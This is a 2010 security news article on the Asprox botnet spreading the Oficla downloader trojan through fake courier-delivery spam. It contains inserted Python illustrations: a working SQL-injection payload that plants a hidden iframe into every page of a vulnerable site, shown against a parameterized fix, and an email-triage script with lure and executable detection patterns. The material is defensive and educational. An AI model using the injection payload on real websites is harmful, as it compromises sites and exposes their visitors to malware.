Nov 18, 2010 14:39 GMT  ·  By

Researchers from M86 Security say the Asprox botnet is responsible for sending the fake failed-parcel-delivery spam that distributes the Oficla trojan.

Oficla, also known as Sasfis, is a family of downloader-type trojans that is primarily used as a distribution platform for other malware.

Scareware creators are regular customers of the pay-per-install businesses built on such downloaders, because their scams are profitable enough to provide the necessary funds.

Oficla was one of the most prevalent email-borne threats during the last quarter, with a particularly active presence in September, when several aggressive campaigns were detected.

It usually arrives in .zip archives attached to spam emails that pose as official communication from known and trusted companies.

One particular theme used in recent months is the failed parcel delivery notification, purportedly from DHL, FedEx, UPS or the United States Postal Service (USPS).

We even saw localized spam campaigns targeting Spanish speakers, which employed the same DHL failed delivery lure to spread the trojan.

Researchers from M86 Security found clear evidence that an important portion of this spam is sent by the Asprox botnet.

"When we examined a spam template from the Asprox control server we observed that it is still very active and was using a UPS (United Parcel Services) or the USPS (United States Postal Service) theme," they note.

Asprox is a trojan that acts as a botnet client and dates back to 2008. Besides sending spam, it spreads by using SQL injection to plant malicious iframes in the pages of legitimate ASP websites, so that visitors to those sites are silently pointed at attacker-controlled content.
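The mass iframe injection described above, as an added illustration that is not Asprox's own code or the ASP/MS SQL environment it targeted: a generic string-concatenated UPDATE lets a single crafted form field rewrite a column the form never exposed (the page body) on every row, while the parameterized version stores the same input harmlessly as a literal title. The table, the pages, the `attacker.invalid` host and the payload are all constructed for this example.

```python
import sqlite3

# Constructed placeholder iframe; attacker.invalid is a reserved, non-resolving name.
INJECTED_IFRAME = '<iframe src="http://attacker.invalid/" width="0" height="0"></iframe>'

# Crafted "title" value. Inside the vulnerable query it closes the string,
# appends the iframe to the body column, widens the WHERE to every row and
# comments out the rest of the original statement.
MASS_INJECTION_TITLE = "x', body = body || '" + INJECTED_IFRAME + "' WHERE 1=1 --"


def make_db() -> sqlite3.Connection:
    """Create an in-memory site database with a few constructed pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO pages (title, body) VALUES (?, ?)",
        [("Home", "<p>Welcome</p>"), ("About", "<p>About us</p>"), ("Contact", "<p>Mail us</p>")],
    )
    conn.commit()
    return conn


def rename_page_vulnerable(conn: sqlite3.Connection, page_id: int, new_title: str) -> None:
    """The classic bug: user input concatenated straight into the SQL text."""
    sql = "UPDATE pages SET title = '" + new_title + "' WHERE id = " + str(page_id)
    conn.execute(sql)
    conn.commit()


def rename_page_safe(conn: sqlite3.Connection, page_id: int, new_title: str) -> None:
    """Parameterized statement: the input can only ever be a title value."""
    conn.execute("UPDATE pages SET title = ? WHERE id = ?", (new_title, page_id))
    conn.commit()


def infected_pages(conn: sqlite3.Connection) -> list:
    """Return ids of pages whose body now carries an iframe (a simple site-owner check)."""
    return [row[0] for row in conn.execute("SELECT id FROM pages WHERE body LIKE '%<iframe%'")]


if __name__ == "__main__":
    vuln = make_db()
    rename_page_vulnerable(vuln, 1, MASS_INJECTION_TITLE)
    print("vulnerable site, infected page ids:", infected_pages(vuln))

    safe = make_db()
    rename_page_safe(safe, 1, MASS_INJECTION_TITLE)
    print("parameterized site, infected page ids:", infected_pages(safe))
```

The `infected_pages` query doubles as the quick audit a site owner can run against a content database after an incident like the June spike mentioned below: any row whose body contains an `<iframe` that the editors never wrote is a compromise indicator.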

There was a sudden spike in Asprox activity back in June, when the number of infected domains jumped from around 2,000 to over 10,000 in a three-day period.

Users are advised to treat email attachments with increased suspicion, even if they appear to originate from trusted sources, and in particular to be wary of .zip archives that contain executables. A multi-engine service like VirusTotal can be used to scan them before opening.
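The lure described earlier (a delivery-failure message from a courier brand carrying a .zip that hides an executable) and the advice above can be turned into a small triage script. The following is an added example, not code from M86 Security or from the article; the message it inspects is constructed inline, the brand and lure keywords are my own assumptions about what the spam looks like, and the SHA-256 it reports is what you would paste into VirusTotal's hash search rather than uploading the file itself.

```python
import email
import hashlib
import io
import os
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Assumed lure vocabulary: a courier/postal brand followed somewhere by delivery wording.
LURE_PATTERN = re.compile(
    r"\b(dhl|fedex|ups|usps|united parcel|postal service)\b.*\b(deliver|parcel|package|shipment)",
    re.IGNORECASE | re.DOTALL,
)

# Extensions a mail gateway should never accept inside an "invoice" or "label" archive.
EXEC_EXTENSIONS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js"}


def build_sample_message(malicious: bool = True) -> bytes:
    """Construct a sample message for the demo (not a real captured spam)."""
    msg = EmailMessage()
    msg["From"] = "UPS Customer Services <noreply@example.com>"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "UPS Delivery Problem NR 4711"
    msg.set_content("Unfortunately we were not able to deliver your parcel. "
                    "Please print the attached document and collect it at our office.")
    if malicious:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            # Fake PE stub standing in for the downloader; 'MZ' header only.
            zf.writestr("UPS_invoice_4711.exe", b"MZ" + b"\x00" * 64)
        msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                           filename="UPS_invoice.zip")
    else:
        msg.add_attachment(b"%PDF-1.4 constructed placeholder", maintype="application",
                           subtype="pdf", filename="UPS_invoice.pdf")
    return bytes(msg)


def triage(raw: bytes) -> dict:
    """Flag a message that pairs a delivery lure with an executable inside a zip attachment."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body_part = msg.get_body(preferencelist=("plain",))
    text = str(msg.get("Subject", "")) + "\n" + (body_part.get_content() if body_part else "")
    result = {"lure": bool(LURE_PATTERN.search(text)), "attachments": []}

    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        info = {"name": part.get_filename() or "", "sha256": hashlib.sha256(data).hexdigest(),
                "executables": []}
        if zipfile.is_zipfile(io.BytesIO(data)):
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for member in zf.infolist():
                    ext = os.path.splitext(member.filename)[1].lower()
                    if ext in EXEC_EXTENSIONS:
                        # Hash the inner file too: this is the sample an AV engine would classify.
                        info["executables"].append({
                            "name": member.filename,
                            "sha256": hashlib.sha256(zf.read(member)).hexdigest(),
                        })
        result["attachments"].append(info)

    result["suspicious"] = result["lure"] and any(a["executables"] for a in result["attachments"])
    return result


if __name__ == "__main__":
    for label, raw in (("malicious", build_sample_message(True)), ("benign", build_sample_message(False))):
        print(label, triage(raw))
```

The check deliberately requires both signals (lure text and an executable inside the archive), so a genuine courier notice with a PDF label passes while the Oficla-style message is flagged; the inner-file hash is what to look up before anyone double-clicks the attachment.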